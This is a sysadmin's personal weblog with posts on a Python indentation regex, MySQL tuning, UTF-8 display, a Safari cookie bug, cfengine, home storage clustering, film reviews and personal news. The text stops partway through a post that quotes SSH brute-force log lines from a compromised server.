Viraj's Weblog

Every now and then I come across some really nifty Python code. Terseness is really not a good virtue of Python code, but I just thought this snippet was very clever. It comes from a really nice online book called Text Processing in Python. The problem deals with flushing a code block to the left, keeping all other indentation the same. In other words, this:

   if blah:
      print 'hi'

gets changed to:

if blah:
   print 'hi'

Simple enough huh? Here is their solution:

from re import findall,sub
# What is the minimum line indentation of a block?
indent = lambda s: reduce(min,map(len,
   findall('(?m)^ *(?=\S)',s)))
# Remove the block-minimum indentation from each line?
flush_left = lambda s: sub('(?m)^ {%d}' % indent(s),'',s)

lambdas are small one-line functions in Python. This text talks alot about 'high order functions' which are basically function generators, and they make extensive use of lambdas. The above creates 2 functions stored in the variables indent and flush_left. flush_left would be called on the text to be processed.

First lets look at 'indent'. Essentially this function is trying to determine the minumum line indentation of a block to remove. It would result in 3 for my example. It's kinda confusing unless you break it down. findall is the innermost function, and it finds all regular expression matches for:

(?m)^ *(?=\S)

The '(?m)' is adding the multiline option to this regexp, so that it would span multiple lines. Then the regexp looks for 1 or more spaces at the beginning of a line given a lookahead assertion that there is a non-whitespace character right after the last space. Whew. So this will return a bunch of strings with some number of spaces.

Next is the call to map(). This function applies a certain function (in this case len()) to a list and returns that list. So the result of the map() call is a list of numbers which are the lengths of leftmost whitespace.

The next call is reduce(), which applies a certain function to pairs of elements in a list, returning one result. Essentially it reduces. In this case it is applying min(), which returns the minimum value. So the final result is the smallest number of leftmost spaces. This whole operation is assigned a lambda function called indent() that takes one argument, the block of code being analyzed.

Next is the flush_left() function:

flush_left = lambda s: sub('(?m)^ {%d}' % 
   indent(s),'',s)

What does this do? Well it does a regexp substitution, replacing '%d' number of spaces at the beginning of a line with nothing. %d is calculated by the indent() function defined above, which is the minimum number of spaces to remove in order to flush everything to the left.

Pretty nifty, but hard to understand at first glance. I'm not sure if I'd ever write such code, but it is fun to analyze. Obviously this wouldn't work with tab-indentation, but a few modifications and it would.

The movers came out this week to take my stuff as well as my car. There were 3 moving guys and they did a pretty good job, considering I had relatively very little to move.

One of the movers had broke something on my screen door while taking a sofa out. I mentioned this to the lead mover and he says to me with a straight face, "I have a 45 in the truck." At first I was like, 45? What does he mean? I didn't know what he was talking about. Then he says, "If you want to aim, I can pull the trigger." At that point I realized ohhh, he's talking about a gun! Hehehe, well at least he had a sense of humor. I found out that he likes busting his coworkers balls'.

Anyway, they were able to fix the door gaffe, so no harm done. I'll be on my way Jan 2nd to the other side of the country.

I had a chance to see an episode from the first season of The Sopranos and realized how much anything after season 1 sucked. It was just so much more interesting back then. Now it's just a very silly soap opera. It seems like the writing completely changed. I wouldn't be surprised if it's now written by new authors.

Neat little Ajax real-time translator.

Ever wondered whether running in the rain helps reduce your wetness? Check out this analysis.

Recently I looked at a client webserver where there were lots of MySQL processes eating up quite a bit of CPU. It's a fairly high traffic site, however when I see mysqld processes staying at 80-90% for more than a few seconds, that tells me something is wrong. It's usually an indication that either they are using some very inefficient queries, do not have the proper indexes, or the tables are getting too large.

So let's see how to debug this. First thing is by the looks of the processes, there must be 1 or 2 queries that are pegging the CPU, and we need to find out what queries are taking long. I started up the mysql client and did a 'show status':

show status;
...
| Slow_queries             | 12256     |
...

Hmm, lot's of slow queries. but that number isn't increasing rapidly. I believe this shows very slow queries only. Next I did a 'show processlist' a few times until something showed up:

show processlist;
...
| 2721 | web  | localhost | development | Query   |    0 | Copying to tmp table |
 SELECT DISTINCT wheel.make FROM inventory LEFT JOIN wheel ON
 inventory.id=wheel.id WHERE status="act |
...

Usually, if you see a query on 'show processlist' consistently, that query is probably unoptimized and taking a long time. The above only showed me part of the query, and I needed to find the whole query to test it. Now I could go digging in the client's source code, but it would be a waste of time trying to find the culprit query. The best way is to enable MySQL logging. MySQL is such a lightweight DB, restarting it usually goes unnoticed even on high traffic webservers. I added to /etc/my.cnf:

[mysqld]
log=/var/log/mysqld/mysqld.log

And made sure to create that logfile writable by the mysql user (it won't log it if it doesn't have the right permissions). Next I find the query I'm looking for:

SELECT DISTINCT diameter
FROM inventory
LEFT JOIN wheel_fitment ON wheel_fitment.wheel=wheel.id
LEFT JOIN wheel ON wheel_fitment.wheel=wheel.id
WHERE status="active" AND vehicle=4566  AND price!=0 AND
wheel_fitment.type="all"
ORDER BY diameter

Ok, I'm not too familiar with the multiple left joins, but I do know what a join is. I run this query manually and it takes anywhere from 6 to 10 seconds to return results. That's definitely too long for a query to take, and the tables are not even that big! Now is when you try to take everything out of the query except the bare necessity that makes it slow. I ended up with:

SELECT DISTINCT diameter 
FROM inventory
LEFT JOIN wheel ON wheel_fitment.wheel=wheel.id
LEFT JOIN wheel_fitment ON wheel_fitment.wheel=wheel.id
WHERE vehicle=4566

Now I needed to know something about these tables. As sysadmins, we usually come in the picture when something has gone wrong, and we really played no part in the development of the system we are diagnosing. I wanted to know whether there were indexes on the tables. I did 'show create table wheel' as well as wheel_fitment and inventory. They all seemed to have proper indexes on the fields being used in the query. Hm what next? Well the double 'LEFT JOINs' looked kinda wierd to me, they are just swapped. The resulting set if I take out the 'DISTINCT' is something like 250k rows, much larger than all of the tables combined. Clearly something is wierd.

I checked the mysql join docs for some help, and determined that the following provides the same results:

SELECT DISTINCT diameter
FROM inventory LEFT JOIN (wheel, wheel_fitment)
ON (wheel_fitment.wheel=wheel.id)
WHERE vehicle=4566

Only now the query takes less than .3 seconds, quite an improvement from 10 seconds! My guess is that MySQL is better able to optimize the latter query.

Wonder what it's like to win the lottery? Well here's a very mean prank played on someone.

Here's a cool video of a camera strapped onto a rocket .

A prayer:

Another year is dawning
With the chance to start anew.
May I be kinder, wiser, Lord,
In all I say and do,

Not so caught up in selfish gain.
That I would fail to see
The things in life that mean the most
Cost not a fancy fee.

The warm, kind word that I can give,
The outstretched hand to help,
The prayers I pray for those in need --
More precious these than wealth.

I know not what may lie ahead
Of laughter or of tears;
I only need to know each day
That You are walking near.

I'm thankful for this brand new year
As now I humbly pray,
My hand secure in Yours, dear Lord,
Each step along the way.

- by Kay Hoffman

Some pretty hilarious videos.

Just heard this Dutch band's music on an IFC video. Very cool, checkout the 'Human' video.

This is an interesting video about time management for sysadmins. Alot of it may be common sense, but there are some useful tips and it is presented well.

Here's a cool little small form factor PC that comes bundled with Ubuntu Linux. Great if you just want to setup a simple hassle-free desktop PC for someone.

Well for the past 4 days I've been very sick. Not sure what I have, but it is an intense and burning sore throat and fever, like nothing I've ever had before. The cough is extremely painful and the first few days I was on the brink of passing out due to the pain. I think I've coughed up at least a gallon of phlegm by now. I've started antibiotics, which I absolutely loathe taking. They make me feel even more like crap, and I have to take them for 5+ days . My fever seems to be gone now which I suppose is a good sign.

This morning I had some sort of coughing fit where I could not for the life of me stop coughing. A minute more of that and I would've had to go to the ER.

Here's an interesting article on Google hiring.

You gotta love interspecies love.

I'm one of the 2 on this earth that doesn't like Lord of the Rings. I believe I am missing the LOTR gene or something. I just can't get into that fantasyland crap, much less 4 hours of it. So naturally I wasn't a big fan of Peter Jackson or knew much of his capabilities. After seeing King Kong, I have much more respect for him. This movie is absolutely amazing, and is truly what a movie should be.

Indian (i.e. Bollywood) movies are known for their length and breadth in the number of emotions they try to eke out of the audience. It's hard for an American viewer to understand them, because the transition between emotions in scenes is so abrupt that it's almost cartoonish. When a movie can span every emotion and smoothly transition between them, that's real directorial skill. That's what King Kong does.

It's 3 hours long, but honestly it didn't feel long at all. That's again a director's skill in keeping the audience enthralled. I was reminded of the Indiana Jones movies, E.T., Close Encounters, and others that just captivated you. This movie's action sequences actually made me sweat in my seat. It's said this was Peter Jackson's labor of love, and it really shows.

It's really amazing how much science and our understanding of animals, especially apes, have contributed to this film. There is probably a stark difference just in this realm from the older version of the movie. When we see Kong and Naomi interacting in many scenes, we understand that Kong sees beauty in her, and is essentially trying to impress her. He goes through the animalistic alpha-male rituals to show his strength. He wants to possess her, and when she is taken away he gains enormous strength to get her back. It's as if he is unstoppable in his goal. I honestly thought of how much the mind can affect the body. That's love for you. Are humans really much different? We do the same things, but just in different ways. Sure we are less primitive, but that's only relatively speaking.

I noticed throughout the movie a connection between ape and human, almost as if Jackson is trying to show Darwin's thoughts. You can see in Kong's face and actions a struggle to reach humanity, and the end result proves this. You realize just how alone this so-called monster really is, and how much he struggles to find love. In the end he realizes the gap is too wide. But he gained the love he was searching for.

If I have any gripes, it has to do with what looks like actors in front of a blue screen. Don't get me wrong, the effects are amazing, but there are certain scenes where the physics just doesn't seem right. Another issue I had was during the dinosaur fight scene. I just couldn't imagine dinosaurs going through so much trouble for a meager piece of meat that is Naomi Watts. I mean she's hot and all, but come on...

I was not sure what to expect with Jack Black seriously acting. I was pleasantly surprised because he did really well.

Here are some pictures I took of apartments in Mountain View, CA. I picked Avalon at Creekside which seemed a good price.

Seems like a nice Christmas gift.

I went out to dinner with some friends and we decided to change a low tire on a BMW 325. Sounds simple right? Well first of all they have this wierd contraption to jack the car and alter the space-time continuum. Once that was figured out, we lifted the car and took all the bolts out, but the wheel would not budge. After a ring to BMW, they said to kick it a few times. We threw some really hard kicks at it but still no budge.

Then we took the emergency brake off. Not a good idea. The car fell off the jack and the wheel came off due to the pressure. Luckily the wheel stayed on and the axle didn't hit the ground. We raised it again and put the new tire back one. Afterwards, the towing service came by and explained how to change a BMW tire. He said to first loosen the lugnuts a bit while the car is on the ground, then drive and slam the breaks a few times. This loosens the wheel. After that, jack the car up and take out the wheel. Hmm, who could possibly figure this out? The manual says nothing about it.

Just some advice on how to change a tire on your ultimate driving machine. But if you're driving one you may as well call for service than do it yourself.

Some of you may already know this, but I have accepted a position of Cluster System Administrator at Google. This was a difficult choice for me due to my past decision to go back to school. However, I think this is a great opportunity and has honestly always been a dream job for me.

I'm in Mountain View, CA now looking for apartments. The rent is definitely up there compared to Florida, but I found a fairly reasonable one that is right next to a bike trail that goes about 2.8 miles to Google. I would really like to bike to work. That would be sweet. I took a walk down the trail and it took me about 1 hour, so I expect a bike to take 20 min or so. I actually walked by Counterpane's office, and thought about all of the Bruce Schneier books I have .

Anyhow, I'll post more as things move forward.

Here is a great website with some workouts you can do without weights. If you do them right, even just workout 1 will leave you sore for a few days. The main thing is keeping the correct posture for all exercises. Trying to do those 'hindu' squats keeping your knees behind your toes is next to impossible if you are not in shape. The 'pyramid' reps are also a killer.

I came across Meebo, which is a web-based IM client. It's a rather amazing AJAX application. Check it out.

Well I came across Mysql's default 4gb limit today. I have Apache logging via mod_log_sql the tables are growing very fast. Just a week's worth of data hits 4gb.

When I think of a database limiting you to a 4gb table I think huh? It just doesn't make much sense to me, and makes me want to use PostgreSQL instead. Sure I can do all this alter table stuff to get it larger than 4gb, but why default it to such a low value in the first place? What's worse, comments from users claim such an alter table can lose records.

Gee, that's great.

I read an interesting article in the latest Linux Journal about someone who used a Linksys NSLU2 file server, installed a Linux firmware on it, and created an iTunes streaming music server. He was able to use this small device to replace a full-blown PC for serving music.

The NSLU2 is a small nifty device with 2 USB ports and an Ethernet port. You hook up USB (v2) hard drives to it, and it has a web-based administrative interface to share out the disks via Samba. Once people were able to install Linux on it, all sorts of cool applications came forth.

But I have another cool idea for such a setup. Think about getting a bunch of these Linksys devices, a bunch of USB drives, and creating a cheap clustered file server. Something that could aggregate the storage of many of these units, and possibly provide some way to easily add or remove nodes on the fly. It would be cool if there was some sort of redundancy or failover as well if a node went down.

A 'node' in this case refers to the Linksys device. On each we could connect 2 hard drives, and then use software RAID 1 to mirror them. This would give us redundant data on one node. Now we would need something to consolidate all of these nodes into one mass storage. There are a few clustering filesystems that I've done some reading on.

Probably the simplest setup is to use (E)NBD, or network block device. This allows a Linux system to 'share' out local devices over the network to be mapped on another system. The local 'device' in this case would be our RAID 1 virtual device. The system that would map these NBDs could be another Linksys node that aggregates them into a RAID 0 device. On that same node we'd run Samba or some other filesharing system. It sounds like a homebrew implementation of Coraid.

This will handle single drive failures, but the problem is if one node goes down, that makes one unit of the RAID 0 inaccessible, and the RAID 0 will fail completely. One option is to use RAID 0 striping on the local node with 2 drives. Then the fileserving node would RAID 1 each pair of nodes, and finally RAID 0 stripe over the pairs. I guess this would be termed a RAID 0+1+0 setup . That might be overkill for a home setup where you can tolerate a bit of downtime to replace a node (at least your data is still safe).

There is another driver called ddraid, but I'm not exactly sure how this would differ from an NBD RAID, and it is documented poorly.

An alternative to NBD is using a clustering filesystem. There are a few for Linux, but many seem to target big-spenders, and have high learning curves and jargon. The most simple and straightforward ones I found were Lustre and PVFS2. I like PVFS2 because it's documentation is easy to follow. It seems to provide easy aggregation of data storage on nodes, allowing addition and removal. It seems to create a virtual directory that is just the aggregate of all nodes. It does not provide redundancy on its own, but using software RAID and failover tools it is possible. I'm a bit confused to how it handles low disk space issues though.

Using RAID 0, I don't believe it would be easy to add more storage as you go. Maybe just using RAID 1 on the nodes, and then aggregating them with NBD and LVM would be enough. LVM would let us grow the filesystem as we added more nodes, and the mirroring saves in case of 1 drive failure.

I think creating a farm of slugs, as these Linksys units are referred to, would be a very cool home project to work on. I hope I can get some time.

There's a good article by Nat Friedman at the end of this month's Linux Journal. A quote:

There's a difference between software that is usable and software that is a pleasure to use. Until you watch people using your software, it's hard to know how well you're doing.

I remember reading in Discover magazine about some company trying to design technology to analyze commonalities in a music database and predict what a person will like. I don't know know if this is from the same company, but Pandora seems awfully close to achieving this.

A friend pointed it out to me and I think I'm already hooked. Normally I listen to Shoutcast streams, which was rather difficult to find consistent music that I liked on any station. Pandora seems to generate personally tailored stations. I wonder how they are achieving this, because I can imagine it requires quite a bit of bandwidth to play so many streams, growing linearly with the number of users. I wonder if these seemingly unique streams are actually shared among many listeners.

Regardless of how they do it, it's very cool. It has consistently predicted music that I like. I don't think I'll be listening to Shoutcast streams anymore, for popular music at least. I'm not sure if I can get any drums and bass from Pandora .

Here is an interesting view of how many Indians educated in India think of free software. I myself am Indian but I was born and raised in the US. I agree with the article that the university systems in India probably do not encourage creativity, but rather focus on employment.

However I think for a person to be interested in free software, they have to have a certain mindset created very early, perhaps much before college. I think the reason I became interested in OSS was not because of school, in fact I did most 'hacking' outside of school. I saw the benefits of OSS and its results, because every bit of 'hacking' or learning I did was dependent on OSS. I needed to have Linux on my system to learn Unix. I needed GCC to learn C, etc. These tools were there and I didn't need to spend money to gain the knowledge on how to use them. I saw that in general OSS seemed to work better than closed source in many cases, and that I could get better support from one lone developer than an army of help desk personnel in a commercial product's support department.

I also worked in the computer science department as a sysadmin, and doing so forced me look for solutions to problems with little budget. It also allowed me to change software to work the way I needed it to. It's one thing to know that the source is there and you can change it, but it's different when you actually do change it. You become much more entwined in OSS, and you realize the true power of it. You realize that this could never have been done if you used a closed source product. All of this contributed to how much I value OSS.

For someone to gain interest in becoming an OSS developer, you need to see all of these things and realize that you want to be part of it as well.

From my A&P textbook:

During the middle of the twentieth century, this rather drastic procedure, called prefrontal lobotomy, was used to "cure" a variety of mental illnesses, especially those associated with violent or antisocial behavior. After a lobotomy, the patient would no longer be concerned about what had previously been a major problem, whether psychological (hallucinations) or physical (severe pain). However, the individual was often equally unconcerned about tact, decorum, and toilet training.

A reader sent in this interesting lobotomy story.

So I'm sitting here studying for exams and thinking to myself: How does it benefit me to know that a pearl fish lives inside the anus of a sea cucumber?

Is it me, or is Sourceforge getting extremely ugly and impossible to navigate? The place is filled with tons of ads and dumb Yahoo search results everywhere. What's worse is the ads and unrelated stuff looks exactly the same as the rest of the page and it is hard to dilineate ads from useful content. I guess that is their goal. For some reason, whenever I go to Sourceforge it feels like I gain 20 pounds.

I think I found a bug in how Safari 1.3.1 is handling cookies.

I've setup Trac, which is a nice Python wiki/bugtracker for a client. There are multiple projects setup, and each has its own authentication via htpasswd. The problem I'm having is when I login to one project, I can't login to the other project without logging out of the previous project. I described the problem fully on this bug posting.

Trac uses a trac_auth cookie to keep track of authentication. It has a specified path associated with it, so it's perfectly ok to have multiple trac_auth cookies for the same site and separate authentications for each. But this is simply not working with Safari. Firefox works fine with this. I have 2 projects setup, one with path /projects/splash and another with path /projects/splash_old. I started looking at some tcpdumps to see what Safari is sending. I noticed that when I tried logging into the 2nd project after logging into the 1st one, Safari sent:

Cookie: trac_auth=36b8db01607d7ab36506ad97d38196b3; trac_auth=eb167bd6b57b7a5dae9a3dee48ef13b2

Note the 2 cookies with the same name. There is only one cookie that is supposed to be associated with the path I'm going to (/projects/splash_old) so I don't understand how it could send 2. The cookie specification states that a client may send multiple values of the same cookie if the cookies are part of a parent path. But /projects/splash is not the parent of /projects/splash_old. Or am I missing something? It seems Safari is incorrectly making this assumption.

Looking at a tcpdump of Firefox shows it only sending one trac_auth cookie for the 2nd project and it works fine. Firefox also correctly shows 2 trac_auth cookies in the cookie browser, one associated with each path (/projects/splash and /projects/splash_old), whereas in Safari I could only see one.

Update: I created some simple scripts to reproduce this. Go to this page which will set 2 cookies. One cookie will be for test.php and another for test.php_notpath.php. Clearly the second php script is not a child of the first one. If you follow the link, you should see HTTP_COOKIE only having one value for SafariCookieBug because the resulting page is not a child page. That's how Firefox behaves, but Safari 1.3.1 shows 2 values.

Update: Well I found out that IE behaves like Safari. So maybe this is not a bug after all.

Update: Deeper into the rabbit hole I go. It turns out Trac uses the Python Cookie module, which doesn't have support for multiple cookies with the same name. It uses a dictionary to store the data. I'll probably make some changes to Trac to get it working, but I submitted a Python bug report.

I'm not a very lingual guy. So when I got a request to see how to store and display Russian characters with MySQL and PHP, I didn't really know too much about it. So began my research.

First of all I was told there was some table that had Russian data in it. When I did a select on it I would get something like:

mysql> select * from polls;
...
| 11 | ??? ???????? ?????? ?????????? ?????????????     | NULL |

Ok, that's reasonable. The mysql client must not know how to display it. But how can I be sure those are actually Russian characters and not actually question marks? If the user never got Russian working, can we be sure there is actually Russian data in there? I wanted to see the true values in there, and came across the ascii() mysql function which gives the ascii value of the first character of a string.

mysql> select ascii(question) from polls;
...
|              63 |

Hmm, 63 is actually the ascii value for a question mark. So I cannot depend on this data. Next task is creating a table and populating it with Russian data. After some searching, I found that I needed to specify the column character set.

create table polls2 ( id int(11) not null auto_increment, 
question text character set utf8, 
lang varchar(10) default null, primary key (id));

Ok great, now how do I enter data? I don't know Russian, nor how to type it. Luckily, I did have some Russian spam on hand, and succeeded in cutting and pasting it. But before I could insert, I had to change my mysql command line connection character set:

set names 'utf8';
insert into polls2 (question) values ('some pasted russian stuff');

That looked like it populated the table ok, and in my OS X terminal I can even see the characters (but they look ugly). I wrote (or rather, stole) some PHP code to query the DB and display it, but was just ending up with junk in the browser. After much searching, I found that a header must be added to the HTML:

... meta HTTP-EQUIV="Content-Type" 
CONTENT="text/html; charset=utf8"
(sorry can't put the brackets here)

Ok, but it still didn't work. I'm starting to dislike these Russians. I then went to Gmail with the Russian spam, and looked at the HTML source of the email displayed in the browser. I saved it, and then copied the html file to the server I was working on. I went to retrieve the file from my server, and whaddaya know it's showing junk characters again. So clearly it wasn't any incorrect data in MySQL or displaying it with PHP on my part. There must be something else going on. It's as if the META HTTP-EQUIV headers specifying language are being ignored.

So I ran wget to show me the headers:

wget -q --save-headers -O - my.site.com/russian.spam.html

And then notice that the server was sending:

Content-Type: text/html; charset=iso-8859-1

Clearly overriding whatever I put in the html headers. I then found there was an AddDefaultCharset in the Apache config which is the culprit. I didn't want to really change that, and instead created an .htaccess with:

AddDefaultCharset Off

Now, after doing all this, I can finally see the Russian characters in the browser, retrieved from MySQL, and displayed with PHP:

Maybe these notes will be helpful to some poor soul.

A friend of mine posted a blog about read() calls and the maximum amount you can read. It got me interested too, so I did some tests as well.

First of all, I notice the read() manpage states (man 2 read):

If count is zero, read() returns zero and has no other results. If count is greater than SSIZE_MAX, the result is unspecified.

SSIZE_MAX on my Linux system is 2gig, or 2^31. I cannot read more than that. In fact, the largest buffer I can malloc is about 2934062847. Both malloc() and read() take types of size_t, type unsigned long, which is 4gig, or 2^32. But it seems read() cannot read more than 2^31. Hm, I know I can't use values greater than 2^32 on 32-bit systems, but I would expect read() to do up to 2^32 and not only 2^31.

Here is a great site that combines Google Maps with Craig's List to provide apartment/home locations.

I recently got a message from a client that said whenever he added groups to a server, they would disappear.

Now this is what I call a system reacting to change. It gives me no surprises. If someone tries to change something I specifically don't want them to change, those changes are eventually discarded. In this case it was /etc/group being checksummed to a copy on the cfengine distribution server, and when the change was found, it simply put back in the original version. Same goes for passwd, shadow, and other important files. This even provides some security to the box, and makes the system look like it's a live organism .

There are many cases where someone goes into the system and breaks something. A tool like cfengine can be used to provide some armor on the system, with some ability for self-correction. Of course someone can just go to the cfengine server and screw up the distribution files there, but that requires some more conscious effort.

It's impossible to code for every possible damage that can be done to a system, but you can think about the major problems and counter those, which is better than nothing. Here is another of my questions on the mailing list. I started a small war, but It's pretty cool to get responses from computer science professors .

Since implementing mod_log_sql for a client, I've come across some interesting issues that required a bit of MySQL tuning.

The way mod_log_sql works is each Apache process makes a connection to the MySQL server. This means the MySQL server must be able to theoretically support n * MaxClients connections where n is the number of webservers. In my case, that value turns out to be 2048. That's alot of connections! The default limit is 100. MySQL 4+ supports setting these sort of variables without restarting the server with a command such as:

set global max_connections=2048;

The other thing I am sure would be required is MySQL's INSERT DELAYED feature. This allows inserts to occur while the table is locked by another process. MySQL does not provide row-level locking on MyISAM tables. I envision the users using these apache log tables quite a bit, and didn't want that to slow down inserts. I had used insert delayed in the past in a spam filter I wrote for CommuniGate Pro. Insert delayed is still a work in progress in the version of mod_log_sql I'm using, so I ended up going to the C code and changing the inserts to 'insert delayed' syntax and recompiling.

When I did the above changes I thought it would be the end of the story. Then came the next problem. The tables are growing fairly large, about 3gigs a week. This is much more than text logs because text logs are usually compressed. So I had to setup some sort of archival scheme. I was testing some pruning SQL statements. The tables don't have indexes, and certain queries were taking minutes. I thought, that's ok, because I'm using insert delayed. Soon, I started noticing the webservers reporting the following whenever I was working on the tables:

[Sat Nov 12 10:04:46 2005] [error] mod_log_sql_mysql: database connection error: mysql error: Too many connections
[Sat Nov 12 10:04:46 2005] [error] mod_log_sql: child spawned but unable to open database link

Huh? How could locking the table cause >2048 connections attempting to be made? This could be a bad design of mod_log_sql, but I thought there has to be some other issue underlying the problem. I did a:

show variables like '%delayed%';

Which showed:

| delayed_insert_limit       | 100   |
| delayed_insert_timeout     | 300   |
| delayed_queue_size         | 100   |
| max_delayed_threads        | 20    |
| max_insert_delayed_threads | 20    |

Hmm, not knowing what these actually do and not finding too much documentation on them I tried increasing delayed_insert_limit, but that didn't do anything and I still got the connection errors. Then I thought, let me try reproducing the problem by locking the table and watching the output of 'show status' for any clues in the 'delayed' variables. So in one window I did:

lock tables access_table read;

And in another I did:

mysql> show status like '%delay%';
+--------------------------+----------+
| Variable_name            | Value    |
+--------------------------+----------+
| Delayed_errors           | 0        |
| Delayed_insert_threads   | 6        |
| Delayed_writes           | 15583200 |
| Not_flushed_delayed_rows | 5        |
+--------------------------+----------+
4 rows in set (0.00 sec)

I did this a few times and noticed Not_flushed_delayed_rows increasing rapidly, which makes sense since I locked the table and insert delayed queries are being queued. As soon as it got to 100, Apache was reporting the connection errors. That clearly told me 100 was a limit somewhere. It wasn't delayed_insert_limit since I tried increasing that already, so I tried increasing delayed_queued_limit. That was it. 'queued' should have pointed that out to me . I changed it to a much larger value (10000) and everything seems smooth now.

These can be set in /etc/my.cnf with lines like:

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
set-variable=max_connections=2048
set-variable=delayed_queue_size=10000

I was reading about a study on emotions. There was an experiment done with people who basically have went through some sort of trauma that made them emotionless. These were people that were at the ultimate calm. Nothing could upset them or make them sad, and also nothing could make them happy. They simply had no emotional states, and did not have these feelings.

What the scientists found out is that these people have trouble making decisions. Whenever they were given simple questions, where they had to choose between many equally valid answers, they could not do it. They would basically be stuck in an 'indecision' mode, and nothing would tip them over to make a choice.

The scientists claimed that emotions are what tips us over to one side, and causes us to make decisions. I thought this was really fascinating. You always hear that you should be calm when making decisions and such, but really if you are completely calm (the ultimate calm) you will not make any decisions. So there has to be some emotion there to push you. It's like being on a fence, or stuck in some race condition or infinite loop.

So when you get emotional keep in mind it's not entirely a bad thing.

I always thought this song was a good job resignation song.

I setup a load balancing Apache setup to log its access log to MySQL with mod_log_sql. This module works nicely. Check it out.

Well after doing alot of work with cfengine, I've come to the realization that the convergence methodology of system administration is the best one. That means many systems slowly converging to a desired setup, and staying that way.

One of the major hassles with sysadmin is making sure servers that should be identical, are actually identical. In terms of software and libraries installed, processes running or not, etc, any sort of divergence is usually a problem.

It takes alot longer to 'administrate' this way, but the extra time you put in at the beginning pays off. I've been setting up a group of machines for a client with cfengine, setting up packages and making configuration changes as needed, all from a central location. I'm not quite to the point where I don't have to even login to other systems, but for many tasks I don't. What's also great is I was able to test how well my 'converging' setup worked. A new server was brought online, and needed to be just like the others. After installing cfengine and letting it go, it worked pretty good, with only minor issues.

I believe we need to move away from fixing systems and instead work on making systems fix themselves. It's more than just automation, it's predicting failures and coming up with solutions. cfengine is a step in that direction, towards an immunological system applied to computers. When you start talking about hundreds of servers, you don't want to ever have to login to any of them. The more 'intelligent' I can make the servers I setup, the better.

In fact I am almost against even setting up monitoring for them. I don't want to be paged or even notified about some server Apache process that died. I want it to restart the process. The less I know the better . We sysadmins need to stop being mechanics and start designing systems that react to change and fix themselves.

Ahh, but we don't live in an ideal world. Anyhow, any steps that can be made towards this goal I think are good ones. cfengine is really cool in its ability.

I recently posted a question to the cfengine mailing list, and seemed to have started a storm about whether a system's hostname should be a FQDN. I did however get my question answered in all that hoopla.

There's a great song by Richard Ashcroft. I thought I would post the lyrics:

(Check the meaning)

When I'm low, and I'm weak, and I'm lost
I don't know who I can trust
Paranoia, the destroyer, comes knocking on my door
You know the pain drifts to days, turns to nights
But it slowly will subside
And when it does, I take a step, I take a breath
And wonder what I'll find

Can you hear what I'm saying?
Got my mind meditating on love, love
Feel what I'm saying
Got my mind meditating on love, love

(The human condition)
(The human condition)

Too much blood, too much hate, turn off the set
There's got to be something more
When Mohammed, Allah, Buddah, Jesus Christ
Are knocking down my door
I'm agnostic getting God, but man
She takes a female form
There's no time, no space, no law
We're out here on our own

Can you hear what I'm saying?
Got my mind meditating on love, love
Feel what I'm saying
Got my mind meditating on love, love

[Check the meaning]
[The human condition]
[Check the feeling]
[The human condition]

Guess it's life, doing it's thing
Making you cry, making you think
Yeah life, dealing it's hand
Making you cry and you don't understand
Life, doing it's thing
Making you cry now, making you think of
Pain, doing it's thing
Making you cry yeah, making you sing

Don't say it, don't say it's too late
Don't, don't say it's too late (It's never too late, it's never too late)
Don't, don't say it's too late (It's never too late)
Don't, don't say it's too late

The human condition, the big decisions
The human condition, the big decisions

I'm like a fish with legs, I fell from the tree
I made a rocket (check the meaning), I made a wheel
I made a rocket (check the feeling), I swam the ocean (check the meaning)
I saw the moon (say a prayer), I seen the universe (and beyond)
I see you (check the feeling), I see me (check the meaning)
That's my reality
And while the city sleeps we go walking

It's a beautiful world
And when the city sleeps we go walking
We find a hole in the sky and then we start talking
And then we say "Jesus Christ, Jesus Christ, Jesus Christ
Buy us some time, buy us some time"
Hear what I'm saying
Can you hear what I'm saying?
Can you hear what I'm saying?
Can you hear what I'm saying?

It's gonna be alright

So I just had a 2nd Anatomy exam and am fairly sure I got an A on it. I studied so many diagrams that were not even on the test. The only thing they put was a pelvis and baby skull, and we had to know all of the parts. There were 2 questions that got me a bit. One was similar to:

What are bones made of?
A. water, proteins, and calcium salts
B. hydroxyapatite
C. All of the above

It had to be either B or C, because I know that proteins, calcium salts, and hydroxyapatite are all part of bones. But the water part got to me. When I see such questions I think they are trick questions, and there are many compounds with water that are not liquid. Alas I picked B which I think is correct.

Usually when I take tests I also look for clues in one question that may help another. For example here was one:

From what are the skull bones formed?

A. endochondral tissue
B. dermal tissue
C. cartilage

Now I didn't have a good idea what endochondral tissue was, but then I thought about the etymology. endo of course means within. Chondro I knew had something to do with cartilage, because there are cells like chondrocytes, chondroblasts, and chondroclasts that all have to do with cartilage formation. So endochondral means within cartilage, and so neither A or C could be the answer. It had to be B. This then helped me with another question similar to:

Dermal tissue forms from neural crest cells. What are other aspects of dermal tissue?

A. also known as endochondral
B. used for bone replacement
C. preceded by a template of cartilage
D. not preceded by a template of cartilage
E. all of the above

Of course E is ruled out because C and D contradict each other (this professor likes to do that alot which is helpful). From previous questions I knew that endochondral is equivalent to cartilage, so it could not be A or C. So the only choices left were B and D. From the previous question I determined skull bones are formed from dermal tissue, so that hinted this was not used for bone replacement. I also knew a bit about fracture healing, and it involves cartilage. So the answer had to be D. Also 'neural crest' hints towards the skull question above.

So throughout the test, I am sort of learning things for other questions, and going back and forth. I know at this point that dermal tissue forms without cartilage and is the basis for the skull. Then I come across this question:

Which of the following bones form from dermal tissue?

A. clavicle
B. femur
C. humerus
D. all of the above

I can infer from previous questions that the limb bones definitely do not form from dermal tissue, because I know that a fracture of a limb involves cartilage formation. The only possible choice was the clavicle, which makes sense. The clavicle is a very weak bone and the whole pectoral girdle is very movable, so I imagined it forming within soft tissues.

Other than that the rest of the 54 questions were pretty painless.

I wonder what 1st person shooter that kid is playing in the background.

So I'm logged into a client's Linux system and see a bunch of 'uselib24' processes running by a user 'tester' and taking up all the CPU. Immediately I knew it was hacked.

It turned out this 'tester' was a valid account with a very easy to guess password, and this is how they got in:

... tons of SSH attempts from 194.57.119.197
Nov 2 16:39:03 server sshd[13998]: Failed password for illegal user fax from 194.57.119.197 port 57895 ssh2
Nov 2 16:39:03 server sshd[14000]: Illegal user fax from 194.57.119.197
Nov 2 16:39:07 server sshd[14000]: Failed password for illegal user fax from 194.57.119.197 port 57995 ssh2
Nov 2 16:39:12 server sshd[14002]: Failed password for tester from 194.57.119.197 port 58116 ssh2
Nov 2 16:39:12 server sshd[14004]: Accepted password for tester from 194.57.119.197 port 58213 ssh2

Then later in the logs, tester comes in from a different IP:

